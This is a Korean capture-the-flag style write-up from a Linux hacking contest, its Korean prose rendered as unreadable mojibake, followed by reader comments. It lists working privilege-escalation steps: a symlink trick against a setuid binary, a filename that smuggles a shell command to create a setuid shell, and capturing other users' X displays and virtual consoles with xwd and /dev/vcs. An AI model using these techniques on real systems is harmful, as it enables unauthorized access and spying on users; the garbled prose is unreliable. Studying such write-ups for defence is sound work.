:::
´ÙÀ½Àº À̹ø Á¦ 1ȸ Hacking The Linux Contest¿¡¼ 3À§¸¦ Â÷ÁöÇÑ djNmc ´ÔÀÇ °ø°Ý º¸°í¼ÀÔ´Ï´Ù. :::
1. ¸®¸ðÆ® ¾îÅÃ
Æ÷Æ®½ºÄµÀ» ÇÑ
ÈÄ 8888¹ø Æ÷Æ®¿¡¼ ¾ÆÀ̵ð¿Í Æнº¿öµå¸¦ ¾Ë¼ö ÀÖ¾ú´Ù.
ID :
guest PW : welcome ÀÓÀ» ¾Ë¾Æ³¿.
2. walwal °èÁ¤ ȹµæ.
bash2-2.05a$
find / -user walwal 2>/dev/null /var/spool/mail/walwal
/etc/sysconfig/network-scripts/.hidden/GUTAPASSWD.TXT
/bin/SolveMe/HackTheNose.txt /bin/SolveMe/walwal /home/walwal
sh-2.05a$ ls -al /bin/SolveMe/ total 28 drwxr-xr-x 2 root root
4096 Aug 16 08:42 . drwxr-xr-x 3 root root 4096 Aug 16 21:31 ..
-rw-r----- 1 root walwal 143 Aug 16 08:38 HackTheNose.txt -rwsr-sr-x 1
walwal walwal 14122 Aug 16 08:38 walwal
[guest@localhost Xtreme]$
strings walwal /lib/ld-linux.so.2 libc.so.6 fgets malloc
__deregister_frame_info sprintf fclose fopen _IO_stdin_used
__libc_start_main __register_frame_info __gmon_start__ GLIBC_2.1
GLIBC_2.0 PTRh QVh ./HackTheNose.txt <--
|
strings·Î
walwalÆÄÀÏÀ» º¸´Ï ./HackTheNose.txt¶ó´Â ¹®ÀåÀ» º¼¼ö ÀÖ¾ú´Ù.
sh-2.05a$ find / -group
walwal 2> /dev/null
/etc/sysconfig/network-scripts/.hidden/WALWALPASSWD.TXT
|
walwalÀÇ
Æнº¿öµå°¡ ÀúÀåµÇ¾î ÀÖ´Â ÆÄÀÏÀ» ã¾Ò´Ù. walwalÀ̶ó´Â ÇÁ·Î±×·¥ÀÌ ½ÇÇàÇÏ´Â µð·ºÅ丮ÀÇ HackTheNose.txt¸¦ Àд´ٴ °¡¼³À»
¼¼¿ì°í µÎ ÆÄÀÏÀ» ¸µÅ©ÇÏ¿´´Ù.
[guest@localhost Xtreme]$ ln -sf
/etc/sysconfig/network-scripts/.hidden/WALWALPASSWD.TXT ./HackTheNose.txt
[guest@localhost Xtreme]$ ./walwal ¸¶Â¡°¡ [guest@localhost Xtreme]$
su walwal Password : [walwal@localhost Xtreme]$
|
3. guta °èÁ¤
ȹµæ.
[walwal@localhost Xtreme]$ cat >> cs.sh #!/bin/sh cp
/bin/sh /tmp/xtreme chmod +s /tmp/xtreme [walwal@localhost Xtreme]$
[walwal@localhost Xtreme]$ ls cs.sh [walwal@localhost Xtreme]$ cd ..
[walwal@localhost tmp]$ ln -s /tmp/Xtreme/cs.sh cs.sh -f
[walwal@localhost tmp]$ chmod 777 /tmp/Xtreme/cs.sh [walwal@localhost
tmp]$ cd ~/ [walwal@localhost walwal]$ cd movie [walwal@localhost
movie]$ date Thu Aug 18 02:18:10 EDT 2002 [walwal@localhost movie]$
touch 08180112 "\";cs.sh\"" [walwal@localhost movie]$ cd /tmp
[walwal@localhost tmp]$ ls -al xtreme -rwsr-sr-x 1 guta guta 541096 Aug
22 00:22 xtreme* [walwal@localhost tmp]$ ./xtreme -p xtreme-2.05a$ id
uid=1000(walwal) gid=1000(walwal) euid=1001(guta) egid=1001(guta)
groups=1000(walwal) xtreme-2.05a$
|
4. mungmung, wizard °èÁ¤ ȹµæ.
BOF¿¡ ´ëÇÑ Áö½ÄÀÌ ¾ø±â ¶§¹®¿¡ ÀüÇô ¹®Á¦¸¦ ÇØ°áÇÒ¼ö ¾ø¾ú´Ù. ±×·¯´Â µµÁß ÇÁ·Î¼¼½º¸¦ º¸´Ù°¡ HantermÀ» ¶ç¿î
Âü°¡ÀÚµéÀÌ ¸¹Àº°É ¹ß°ßÇÏ¿´´Ù. ±×·¡¼ xwd¶ó´Â X À©µµ ĸÃÄ ÇÁ·Î±×·¥À» ÀÌ¿ë Âü°¡ÀÚµéÀÇ È¸éÀ» ĸÃÄÇÏ¿´´Ù. ±×·¯´Â µµÁß
mungmung°èÁ¤ÀÇ Æнº¿öµå¿Í. wizard°èÁ¤ÀÇ ¹éµµ¾î À§Ä¡¸¦ ã¾Æ³»°Ô µÇ¾ú´Ù.
[root@localhost
public_html]$ xwd -display IP:0.0 -root -out outfile [root@localhost
public_html]$ convert outfile outfile.jpg
|
5. °ü¸®ÀÚ Ä¸ÃÄ ¹æ¹ý.
(1)
-°¡»ó ÄÜ¼Ö ½ºÅ©¸° ÆÄÀÏ-
bash-2.05a$ ls -al /dev/vcs* crw--w---- 1 vcsa
tty 7, 0 Apr 11 10:25 /dev/vcs crw--w-r-- 1 vcsa tty 7, 1 Apr 11 10:25
/dev/vcs1 <--- Àб⠱ÇÇÑÀÌ ÀÖ´Ù. crw--w---- 1 vcsa tty 7, 10 Apr 11 10:25
/dev/vcs10 crw--w---- 1 vcsa tty 7, 11 Apr 11 10:25 /dev/vcs11
crw--w---- 1 vcsa tty 7, 12 Apr 11 10:25 /dev/vcs12 crw--w---- 1 vcsa
tty 7, 13 Apr 11 10:25 /dev/vcs13 crw--w---- 1 vcsa tty 7, 14 Apr 11 10:25
/dev/vcs14 crw--w---- 1 vcsa tty 7, 15 Apr 11 10:25 /dev/vcs15
crw--w---- 1 vcsa tty 7, 16 Apr 11 10:25 /dev/vcs16 crw--w---- 1 vcsa
tty 7, 17 Apr 11 10:25 /dev/vcs17 bash-2.05a$ cat /dev/vcs1
[
»ý·« ] bash-2.05a$
|
(2) -¸®´ª½ºÀÇ xwdÇÁ·Î±×·¥À» »ç¿ë-
ÇÁ·Î¼¼½º È®ÀÎÁß root±ÇÇÑÀ¸·Î hantermÀÌ µ¹¾Æ°¡°í ÀÖ´Â °ÍÀ» ¹ß°ß.
[root@localhost public_html]$ xwd -display ROOTIP:0.0 -root -out outfile
[root@localhost public_html]$ convert outfile outfile.jpg
|
**
ÀÔ»óÀÚ¿¡°Ô ÇѸ¶µð!! **
°¥°¥ÀÌ : xwd°¡Á¶Äï.. . linu : ³ªµµ ÷ ¾Ë¾Ò´Ù ¤Ñ¤Ñ¤» xwd . linu : index Çì´õÆÄÀÏ? Á¶ÀÛÇϼ̳ª? -_- index ±Ùóµµ ¸ø°¡º» Àú·Î½á´Â..µµÀúÈ÷ ÀÌÇØ°¡. . Åä½Ã : ¼ö°íÇϼ̽À´Ï´Ù.(__) . w0rm9 : ¿ª½Ã °í¼öÀÔ´Ï´Ù. ( __) . ±¸¸£¹Ì : ÃßÄ«ÇØ..Ä«Ä« ¤Ñ¤Ñ;¾¾Æþ ¤Ñ¤Ñ; ¤» -_- . indra : Àý¶©!!! ¹ä»ç-_- ±¸¸®¹Ìµµ ¹ä»ç!! --; . peer : -_-; .
|
À̸§
: ³»¿ë :
|